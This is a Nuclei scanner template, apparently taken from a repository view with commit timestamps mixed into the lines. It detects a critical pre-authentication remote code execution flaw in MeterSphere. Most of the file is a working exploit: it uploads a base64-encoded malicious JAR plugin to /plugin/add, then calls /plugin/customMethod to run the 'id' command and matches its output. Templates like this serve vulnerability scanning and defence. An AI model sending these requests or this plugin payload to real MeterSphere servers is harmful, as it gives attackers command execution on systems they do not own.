nuclei-templates/http/vulnerabilities/metersphere/metersphere-plugin-rce.yaml

70 lines
14 KiB
YAML
Raw Normal View History

id: metersphere-plugin-rce
info:
name: MeterSphere - Remote Code Execution
author: pdteam,y4er,pdresearch,rootxharsh,iamnoooob
severity: critical
2022-05-31 09:03:16 +00:00
description: |
MeterSphere is susceptible to remote code execution.
reference:
- https://y4er.com/post/metersphere-plugincontroller-pre-auth-rce/
- https://github.com/metersphere/metersphere
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
metadata:
max-request: 2
verified: true
tags: metersphere,rce,intrusive
http:
- raw:
2022-01-18 05:16:50 +00:00
- |
POST /plugin/add HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryreButJNjkCniQExX
------WebKitFormBoundaryreButJNjkCniQExX
Content-Disposition: form-data; name="file"; filename="metersphere-plugin-DebugSampler-1.0.1-jar-with-all-dependencies.jar"
2022-01-18 05:16:50 +00:00
Content-Type: application/octet-stream
{{base64_decode("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
2022-01-18 05:16:50 +00:00
------WebKitFormBoundaryreButJNjkCniQExX
Content-Disposition: form-data; name="request"; filename="blob"
Content-Type: application/json
null
------WebKitFormBoundaryreButJNjkCniQExX--
- |
POST /plugin/customMethod HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"entry":"io.metersphere.plugin.DebugSampler.UiScriptApiImpl","request":"id"}
matchers-condition: and
matchers:
- type: word
2022-05-31 09:03:16 +00:00
part: body
words:
- '"data":'
- '"success":true'
condition: and
- type: regex
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
- type: status
status:
- 200
extractors:
- type: regex
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"